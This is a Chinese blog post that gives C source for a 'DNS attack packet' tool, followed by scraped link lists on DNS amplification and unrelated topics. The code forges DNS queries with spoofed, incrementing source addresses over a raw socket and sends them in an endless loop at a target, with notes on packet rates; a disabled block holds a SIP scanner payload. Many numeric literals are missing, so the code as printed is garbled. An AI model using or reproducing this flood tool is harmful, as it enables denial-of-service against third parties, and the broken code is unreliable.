dns攻击包代码实现
博客地址:http://home.cnblogs.com/u/zengjianrong/
代码没有做好精简,有些多余的没有删去,因为博主太懒了哈哈
#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/time.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <sys/ioctl.h> #define WORD unsigned short
#define DWORD unsigned long typedef struct ip_hdr
{
unsigned char ip_verlen; // IP version & length
unsigned char ip_tos; // IP type of service
unsigned short ip_totallength; // Total length
unsigned short ip_id; // Unique identifier
unsigned short ip_offset; // Fragment offset field
unsigned char ip_ttl; // Time to live
unsigned char ip_protocol; // Protocol(TCP, UDP, etc.)
unsigned short ip_checksum; // IP checksum
unsigned int ip_srcaddr; // Source address
unsigned int ip_destaddr;
}IP_HDR;
typedef struct tcp_hdr
{
unsigned short sport;
unsigned short dport;
unsigned int seqnum;
unsigned int acknum;
unsigned char DataOffset;
unsigned char Flags;
unsigned short Windows;
unsigned short Checksum;
unsigned short UrgPointer;
}TCP_HDR; typedef struct udp_head
{
unsigned short sport;
unsigned short dport;
unsigned short len;
unsigned short Checksum;
}UDP_HDR; typedef struct ps_hdr
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
}PS_HDR; typedef struct {
unsigned short id; //标识,通过它客户端可以将DNS的请求与应答相匹配;
unsigned short flags; //标志:(查询)0x0100 (应答)0x8180 这些数字都是主机序
unsigned short questions; //问题数目
unsigned short answers; //资源记录数目
unsigned short author; //授权资源记录数目
unsigned short addition; //额外资源记录数目
}DNS_HDR; #define MAX_BUF_LEN 30*1024*1024 int socketid = -;
unsigned short checksum(unsigned short *buffer, int size)
{
unsigned long cksum=;
while (size > )
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size)
{
cksum += *(unsigned char*)buffer;
}
cksum = (cksum>>)+(cksum&0xffff);
cksum += (cksum>>);
return (unsigned short)(~cksum);
} void makerawpacket(unsigned char *buffer, int len, unsigned char *ucSIp, unsigned char *ucDIp, unsigned int k)
{
IP_HDR ipheader;
TCP_HDR tcp_header;
UDP_HDR udp_header;
DNS_HDR dns_header;
unsigned long dwFromIP = inet_addr(ucSIp);
unsigned long dwToIP = inet_addr(ucDIp); dwFromIP += htonl(k);
char tcpCheckBuf[];
PS_HDR pseudo_header; memcpy(&ipheader,buffer+,sizeof(IP_HDR));
ipheader.ip_srcaddr=(dwFromIP);
ipheader.ip_destaddr=dwToIP;
ipheader.ip_checksum = 0xffff;
ipheader.ip_checksum=checksum((unsigned short *)&ipheader,);
memcpy(&udp_header,buffer++sizeof(IP_HDR),sizeof(UDP_HDR));
udp_header.Checksum= 0xffff; pseudo_header.source_address =ipheader.ip_srcaddr ;
pseudo_header.dest_address =ipheader.ip_destaddr ;
pseudo_header.placeholder = ;
pseudo_header.protocol = 0x11;
pseudo_header.tcp_length = htons(sizeof(udp_header)+len);
memcpy(tcpCheckBuf,&pseudo_header,sizeof(pseudo_header));
memcpy(tcpCheckBuf+sizeof(pseudo_header),&udp_header,sizeof(udp_header));
memcpy(tcpCheckBuf+sizeof(pseudo_header)+sizeof(udp_header),buffer++sizeof(ipheader)+sizeof(udp_header),len);
udp_header.Checksum = checksum((unsigned short*)(tcpCheckBuf),sizeof(pseudo_header)+sizeof(udp_header)+len);
memcpy(buffer+,&ipheader,sizeof(ipheader));
memcpy(buffer++sizeof(ipheader),&udp_header,sizeof(udp_header));
} #if 0 /* Modified by zengjianrong on 2014年12月15日14时 */
int nSendAttackPacketFromPcap(FILE *fp)
{
int nGetLen = ;
static int RetLen = ;
int CheckIndex = ;
static unsigned char *readbuf;
int i;
unsigned char MacBuf[] = {/*main mac*/0x00 ,0x21 ,0xf2 ,0x00 ,0x00 ,0x06,/*extend mac*/0x78 ,0x8c ,0x54 ,0x33 ,0xbb ,0x7b,0x08,0x00};
IP_HDR iphead;
UDP_HDR udphead;
unsigned char sendBuf[];
int sendlen = ;
struct sockaddr addr;
int nPacket = ;
unsigned char RealMacBuf[] = {/*main mac*/0x00,0x21,0xF2,0x00,0x0A,0x29,/*extend mac*/0x00,0x0C,0x29,0x66,0xB0,0x45,0x08,0x00};
static int firstcall = ; #if 1 /*Modified by kcr, 2014-11-24*/
if (==firstcall)
{
printf("nSendAttackPacketFromPcap first call\n");
readbuf = malloc(MAX_BUF_LEN);
if (NULL==readbuf)
return -;
RetLen = fread(readbuf,,MAX_BUF_LEN,fp);
printf("read %d\n",RetLen);
fclose(fp);
}
firstcall = ; memcpy(sendBuf,RealMacBuf,);
CheckIndex = ;
while(CheckIndex<(RetLen-))
{
/*printf("%02x ",readbuf[CheckIndex]);*/ /*Modified by kcr,2014-11-13*/
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
nPacket++;
/*MAC match*/
memset(&iphead,,sizeof(IP_HDR));
memset(&udphead,,sizeof(UDP_HDR));
memcpy(&iphead,&readbuf[CheckIndex],sizeof(IP_HDR));
CheckIndex += sizeof(IP_HDR);
memcpy(&udphead,&readbuf[CheckIndex],sizeof(UDP_HDR));
CheckIndex += sizeof(UDP_HDR); udphead.sport = htons();
memcpy(sendBuf,RealMacBuf,);
memcpy(sendBuf+,&iphead,sizeof(IP_HDR));
memcpy(sendBuf++sizeof(IP_HDR),&udphead,sizeof(UDP_HDR));
sendlen = ntohs(udphead.len)-;
memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR),&readbuf[CheckIndex],sendlen);
CheckIndex += sendlen;
makerawpacket(sendBuf,sendlen, , , );
memset(&addr, , sizeof(addr));
strcpy(addr.sa_data, "eth2");
if (sendto(socketid, sendBuf, +sizeof(IP_HDR)+sizeof(UDP_HDR)+sendlen, , &addr, sizeof(addr)) < )
{
}
usleep();
}
return nGetLen;
#else "REGISTER sip:61.144.88.146 SIP/2.0\r\n\
Via: SIP/2.0/UDP 5.196.76.190:;branch=z9hG4bK-;rport\r\n\
Content-Length: \r\n\
From: \"7608\" <sip:7608@61.144.88.146>;tag=%10d\r\n\
Accept: application/sdp\r\n\
User-Agent: friendly-scanner\r\n\
To: \"7608\" <sip:7608@61.144.88.146>\r\n\
Contact: sip:@1.1.1.1\r\n\
CSeq: REGISTER\r\n\
Call-ID: %10d\r\n\
Max-Forwards: \r\n\r\n" #endif /*End of Modified by kcr*/ /*free(readbuf);*/ /*Modified by kcr,2014-10-16*/
}
#endif /* #if 0, End of Modified by zengjianrong on 2014年12月15日14时 */ int vp_CreatTask(void (*funcptr)(),void *argv)
{
pthread_attr_t attr;
int ret;
size_t stacksize = ;
int tid;
struct sched_param prv_priority;
int sched_policy;
int error; memset(&attr,,sizeof(pthread_attr_t));
ret=pthread_attr_init(&attr); stacksize = /*PTHREAD_STACK_MIN*3*/*;
ret = pthread_attr_setstacksize(&attr, stacksize); #if 0 /*Modified by kcr, 2014-03-12*/
pthread_attr_getschedparam( &attr, &prv_priority); sched_policy = SCHED_FIFO;
pthread_attr_setschedpolicy( &attr, sched_policy ); prv_priority.sched_priority = ;
pthread_attr_setschedparam( &attr, &prv_priority);
#endif /*End of Modified by kcr*/ ret = pthread_create((pthread_t *)&tid,&attr,(void *)funcptr, argv); return ret;
} int nSendAttackPacket(unsigned char *ucSIp, unsigned char *ucDIp, unsigned char *RealMacBuf, unsigned int unMaxCnt)
{
int nGetLen = ;
int CheckIndex = ;
unsigned int k;
IP_HDR iphead;
UDP_HDR udphead;
DNS_HDR dns_header;
unsigned char dnsQueries[]={
/*08 6c 65 61 73 65 77 65
62 03 63 6f 6d 00 00 01
00 01*/
0x08, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x77, 0x65,
0x62, 0x03, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x01,
0x00, 0x01,
0x00, 0x00, 0x29, 0x23, 0x28, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00};
unsigned char sendBuf[];
int sendlen = ;
struct sockaddr addr;
int nPacket = ;
unsigned int unCnt = ;
unsigned int unCnt_2 = ;
memcpy(sendBuf,RealMacBuf,); memset(&iphead,,sizeof(IP_HDR));
iphead.ip_verlen = 0x45;
iphead.ip_tos = ;
iphead.ip_totallength = htons(0x45);
iphead.ip_id = htons(0x9045);
iphead.ip_offset = ;
iphead.ip_ttl = ;
iphead.ip_protocol = ; /* udp */ memset(&udphead,,sizeof(UDP_HDR));
udphead.sport = htons();
udphead.dport = htons(0x35); /* dns */
udphead.len = htons(0x31);
udphead.Checksum = 0x0; memset(&dns_header, , sizeof(DNS_HDR));
dns_header.id = htons(0xd2ce);
dns_header.flags = htons(0x0100); //标志:(查询)0x0100 (应答)0x8180 这些数字都是主机序
dns_header.questions = htons(); //问题数目
dns_header.answers = ; //资源记录数目
dns_header.author = ; //授权资源记录数目
dns_header.addition = htons(); memcpy(sendBuf,RealMacBuf,);
memcpy(sendBuf+,&iphead,sizeof(IP_HDR));
memcpy(sendBuf++sizeof(IP_HDR),&udphead,sizeof(UDP_HDR));
memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR), &dns_header, sizeof(dns_header)); memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header),
&dnsQueries, sizeof(dnsQueries)); memset(&addr, , sizeof(addr));
strcpy(addr.sa_data, "eth1");
k=;
//printf("func:%s,line:%d, delay Cnt=0x%x\n", __FUNCTION__, __LINE__, unMaxCnt);
while ()
{
makerawpacket(sendBuf,sizeof(dns_header)+, ucSIp, ucDIp, k);
k++;
if (sendto(socketid, sendBuf, +sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header)+, , &addr, sizeof(addr)) < )
{
}
//usleep(20); #if 1 /* Modified by zengjianrong on 2014年12月12日17时 */
unCnt = ;
while(unMaxCnt > unCnt)
{
unCnt ++;
}
#endif /* #if 0, End of Modified by zengjianrong on 2014年12月12日17时 */
} return ;
/*free(readbuf);*/ /*Modified by kcr,2014-10-16*/
} void RecvRespond(void)
{
int socket_fd;
unsigned char Buf[];
struct sockaddr_in LocalAddr;
struct sockaddr_in RemoteAddr;
fd_set recset;
struct timeval wait;
int nBytes;
int RemoteAddrLen =sizeof(struct sockaddr_in); socket_fd = socket(AF_INET, SOCK_DGRAM, );
memset(&LocalAddr, , sizeof(struct sockaddr_in));
LocalAddr.sin_family = AF_INET;
LocalAddr.sin_addr.s_addr = htonl(INADDR_ANY);
LocalAddr.sin_port = htons(); bind(socket_fd, (struct sockaddr *)&(LocalAddr), sizeof(struct sockaddr)); while()
{
memset(&recset, , sizeof(fd_set));
FD_SET(socket_fd, &recset); memset(&RemoteAddr, , sizeof(struct sockaddr_in)); wait.tv_sec = ;
wait.tv_usec = ;
nBytes = select(FD_SETSIZE, &recset, , , &wait);
if(nBytes>)
{
nBytes = recvfrom(socket_fd,Buf,,, (struct sockaddr *)&RemoteAddr,&RemoteAddrLen);
}
}
} void str2mac(unsigned char *ucInput, unsigned char *ucOutput)
{
unsigned char ucTemp = ;
int i = , j = , k = ;
do
{
//printf("func:%s,line:%d,0x%x. \n", __FUNCTION__, __LINE__, ucInput[i]);
if ((':' == ucInput[i]) || ('\0' == ucInput[i]))
{
ucOutput[j] = ucTemp;
j ++;
k = ;
}
else
{
if ( == k)
{
if (ucInput[i]>='' && ucInput[i] <= '')
ucTemp = ucInput[i] - '';
else
ucTemp = ucInput[i] - 'a' + ;
}
else
{
if (ucInput[i]>='' && ucInput[i] <= '')
ucTemp = (ucTemp<<) | (ucInput[i] - '');
else
ucTemp = (ucTemp<<) | (ucInput[i] - 'a' + );
}
k = ;
}
}while ('\0' != ucInput[i++]); } /*
Delay = 100000000,大约为4个,
Delay = 10000000,大约为40个,
Delay = 1000000,大约为360个,
Delay = 100000,大约为2930个,
Delay = 10000,大约为6500个,
Delay = 0,大约为5w多个,
*/
int main(int argc,void *argv[])
{
int optval = ;
unsigned char RealMacBuf[];
#if 0 /* Modified by zengjianrong on 2014年12月2日15时 */
FILE *fp; if(argc<)
return ; printf("open file %s\n",argv[]);
fp = fopen(argv[],"rb+");
if(NULL==fp)
{
printf("Can't open file %s\n",argv[]);
return ;
}
#endif /* #if 0, End of Modified by zengjianrong on 2014年12月2日15时 */
if ( > argc)
{
printf("eg.: ./attack sip smac dip dmac delay\n");
return -;
}
memset(RealMacBuf, , ); str2mac(argv[], &(RealMacBuf[]));
str2mac(argv[], RealMacBuf);
RealMacBuf[] = 0x08;
RealMacBuf[] = 0x00; printf("create socket\n");
if ((socketid = socket (PF_PACKET, SOCK_PACKET, htons(0x800))) == -) {
return -;
}
printf("set SO_BROADCAST\n");
if (setsockopt(socketid, SOL_SOCKET, SO_BROADCAST, &optval, sizeof(optval)) == -) {
close(socketid);
return -;
} vp_CreatTask(RecvRespond,);
while()
{
nSendAttackPacket(argv[], argv[], RealMacBuf, strtoul(argv[], NULL, ));
/*printf("loop back\n");*/ /*Modified by kcr,2014-11-24*/
//usleep(100000); /*Modified by kcr,2014-11-13*/
}
}
dns攻击包代码实现的更多相关文章
- DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器
DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E ...
- 什么是DNS攻击?它是如何工作的?
什么是DNS攻击?它是如何工作的? DNS攻击是一种利用域名系统中的弱点或漏洞的网络攻击.今天,互联网已成为我们生活中不可或缺的一部分.从社交到金融.购物再到旅游,我们生活的方方面面都是互联网.由于互 ...
- DNS攻击
DNS攻击 实验是基于Linux系统,配置了bind9服务的机器 大纲 本地修改Host文件重定向路径到指定地址 对User的DNS查询进行欺骗攻击 在同一局域网下,对DNS服务器的DNS查询进行欺骗 ...
- web攻击之六:DNS攻击原理与防范
随着网络的逐步普及,网络安全已成为INTERNET路上事实上的焦点,它关系着INTERNET的进一步发展和普及,甚至关系着INTERNET的生存.可喜的是我们那些互联网专家们并没有令广大INTERNE ...
- 《DNS攻击防范科普系列2》 -DNS服务器怎么防DDoS攻击
在上个系列<你的DNS服务真的安全么?>里我们介绍了DNS服务器常见的攻击场景,看完后,你是否对ddos攻击忧心重重?本节我们来告诉你,怎么破局!! 首先回顾一下DDoS攻击的原理.DDo ...
- DNS 攻击方式及攻击案例
[赛迪网-IT技术报道]2010年1月12日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈, 12时左右基本恢复正常:18时许百度发布官方版本公告:对事故原因说明为:"因www.ba ...
- 一个DNS数据包的惊险之旅
踏上旅程 “小子,快去查一下www.paypal.com的IP地址,我急用,晚了我弄你!”,暴躁老哥一把关上了门,留我一个DNS数据包在冷冰冰的房间. 过了一会儿,一位大叔打开了门,带着我来到了一座叫 ...
- 用wiershark抓dns数据包
wireshark是非常好的抓包工具,捕获工具也很强大.比如说我只要抓dns数据包,其他数据包全部丢弃. 步骤如下: 选择菜单->捕获-捕获接口-输入-所选择接口的捕获过滤器:port 53 1 ...
- 常见的DNS攻击——偷(劫持)、骗(缓存投毒)、打(DDos)
常见的DNS攻击包括: 1) 域名劫持 通过采用黑客手段控制了域名管理密码和域名管理邮箱,然后将该域名的NS纪录指向到黑客可以控制的DNS服务器,然后通过在该DNS服务器上添加相应域名纪录,从而使网民 ...
随机推荐
- JDK1.8新特性——Stream API
JDK1.8新特性——Stream API 摘要:本文主要学习了JDK1.8的新特性中有关Stream API的使用. 部分内容来自以下博客: https://blog.csdn.net/icarus ...
- Mybatis插入实体类字段为关键字解决方案
1. Mybatis插入实体类字段为关键字解决方案 1.1. 前言 可能你插入字段为关键字时报如下错误,且字段名不适合改变 You have an error in your SQL syntax; ...
- 变量、数据类型、python内存管理
pycharm快捷键 ctrl + c 复制, 默认复制整行 ctrl + v 粘贴 ctrl + x 剪切 ctrl + a 全选 ctrl + z 撤销 ctrl + f 查找 ctrl + sh ...
- oracle dg状态检查及相关命令
oracle dg 状态检查 先检查备库的归档日志同步情况 SELECT NAME,applied FROM v$archived_log; alter database recover manage ...
- emacs cedet
用emacs写c或者c++代码用的插件的配置.功能是能够代码补齐. (require 'package) (package-initialize) (add-to-list'package-archi ...
- Redis缓存实战教程
目录 Redis缓存 使用缓存Redis解决首页并发问题 1.缓存使用的简单设计 2.Redis的整合步骤 A 将Redis整合到项目中(Redis+Spring) B 设计一个数据存储策越 3.Re ...
- JS高阶---对象创建模式(5种)
[前言] 函数高级部分先看到这里,接下里看下面向对象高级部分 .对象创建模式 .继承模式 [主体] (1)Object构造函数模式 案例如下: 测试结果如右图所示 (2)对象字面量形式创建 案例如下: ...
- appium自动化常用API
常用函数 一.获得信息类API (1)获取当前页面的activity名,比如: (.ui.login.ViewPage) current_activity() 比如我们需要实现这个登录的功能时,主要 ...
- JWT(Json Web Token):一种在Web应用中安全传递信息的规范 转载
文本将介绍一种在Web应用中安全传递信息的方式,称为JWT. 本文内容是对JWT官网介绍说明的英文翻译而来,由于本文英文水平有限,如有错误,还请指出,谢谢. What is JSON Web Toke ...
- android主流开源自动化框架(monkeyrunner,robotium,uiautomator)转载
摘要: android自动化框架小结:monkey,monkeyrunner,cts,robotium,uiautomator android自动化框架: Uiautomator: 优点:可以对所有操 ...